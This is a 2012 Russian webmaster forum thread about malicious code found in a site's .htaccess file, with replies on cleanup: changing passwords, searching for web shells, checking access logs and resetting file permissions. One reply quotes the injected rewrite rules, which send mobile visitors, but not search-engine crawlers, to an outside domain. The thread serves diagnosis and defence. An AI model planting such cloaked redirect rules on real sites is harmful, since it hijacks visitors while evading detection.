Помощник
|
Вредоносный код в .htaccess |
VitaL
|
Сообщение
#1
|
||
|
|
||
|
|||
poroch |
24.8.2012, 3:04;
Ответить: poroch
Сообщение
#2
|
|
было похожее, редиректило мобильный траф на левые партнерки =\
|
|
|
AmoSeo |
24.8.2012, 3:21;
Ответить: AmoSeo
Сообщение
#3
|
|
Первым делом смените пароли на ftp, панель управления на хостинге, email.
Сталкивался с подобным инородным кодом в .htaccess который после родного кода находился с большим отступом внизу. Например у меня на 296 линии начало инородного кода такое было: RewriteEngine on RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_vali dator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yande xaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yande x imageresizer) [NC] RewriteRule (.*) http://browser77.com/u/4393 [L,R=302] Возможно он стоял продолжительное время, а обнаружил когда один из пользователей пжаловался что с мобилы нельзя сайт посмотреть типо редиректит на google Почистил и сменил выше указанные пароли. Сообщение отредактировал AmoSeo - 24.8.2012, 3:22 -------------------- Наполнение магазинов товарами: Opencart, SimplaCMS, Webasyst и т.д. |
|
|
BestProxies |
24.8.2012, 7:20;
Ответить: BestProxies
Сообщение
#4
|
|
Думаю сменить пароли будет недостаточно, во-первых, на хост уже скорее всего залит веб-шелл, во вторых, этот шелл могли залить используя какую-то уязвимость (ошибку программирования), имеющуюся на сайте, так что нужно ещё найти и удалить шелл, и попытаться понять, каким образом его залили. Помочь в этом может анализ логов доступа к веб-серверу.
-------------------- Прокси проверяются на работу с Яндекс, Google, Twitter, Mail.ru и на возможность отправки почты |
|
|
RageLT |
24.8.2012, 8:34;
Ответить: RageLT
Сообщение
#5
|
|
Совсем недавно столкнулся с такой же проблемой. Сайты работали на joomle. У одного из них файлы имели права на исполнение, что позволяли злоумышленниками менять на всех сайтах .htaccess файлики. Скорее всего программно простукиваются сайты и дёргается определённый файл.
Саму джуму не трогал, просто рекурсивно пробежался и выставил файлам правильные права, заодно и директориям. Проблема пропала. Как я понял доступ по ssh есть, вот попробуй. cd /www
find . -type d -exec chmod 755 {} \; find . -type f -exec chmod 644 {} \; -------------------- |
|
|
0alex1 |
24.8.2012, 10:41;
Ответить: 0alex1
Сообщение
#6
|
|
Была не давно такая же ситуация на таймвебе. На всех сайтах, оклоо 20 шутк, не зависимо от движка в файле .htaccess появился в конце кусок кода. Редиректил на какую то гадость, но не при каждом обращении к сайту. Некоторые сайты при этом вообще перестали работать, поэтому сразу и обнаружил. Удалил эти куски и все. Было ощущение что сам сервер взломали и программно добавили во все файлы .htaccess один и тот же код вне зависимости от результата.
-------------------- |
|
|
Aqaus |
24.8.2012, 11:32;
Ответить: Aqaus
Сообщение
#7
|
|
cd /www
find . -type d -exec chmod 755 {} \; find . -type f -exec chmod 644 {} \ Без ssh можно admin tools сделать. Надо анализировать, через что ломали. Повторится может. -------------------- Помог? Поставь плюс. |
|
|
Rxp |
24.8.2012, 21:36;
Ответить: Rxp
Сообщение
#8
|
|
Станлартная ситуация при взломанном сайте или хосте, обращайтесь проверим все на вирусы, сам сервак + дадим рекомендации!
Сообщение отредактировал Rxp - 24.8.2012, 21:50 -------------------- |
|
|
VitaL
|
Сообщение
#9
|
|
|
Мне было интересно, что этот код делал, сайт я уже почистил. Всем спасибо за ответы.
|
|
|
||
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Почистить код на сайте | 1 | Timka | 1105 | 2.1.2021, 1:13 автор: 0pium |
|
Вы мне код, я вам как - делать не надо. | 0 | fedornabilkin | 958 | 18.9.2020, 18:59 автор: fedornabilkin |
|
Adobe muse: Не могу разместить нужный мне код сразу после Body | 0 | Evg82 | 3832 | 20.6.2020, 10:24 автор: Evg82 |
|
Как перенести правила переадресации из .htaccess в php обработчик nginx? | 0 | KrisGuseva | 2097 | 28.12.2019, 7:33 автор: KrisGuseva |
|
Повесить мой код Адсенса на ваш сайт на 1-2 дня | 4 | WildWeb8 | 3726 | 18.7.2018, 20:04 автор: startseo |
Текстовая версия | Сейчас: 19.4.2024, 4:46 |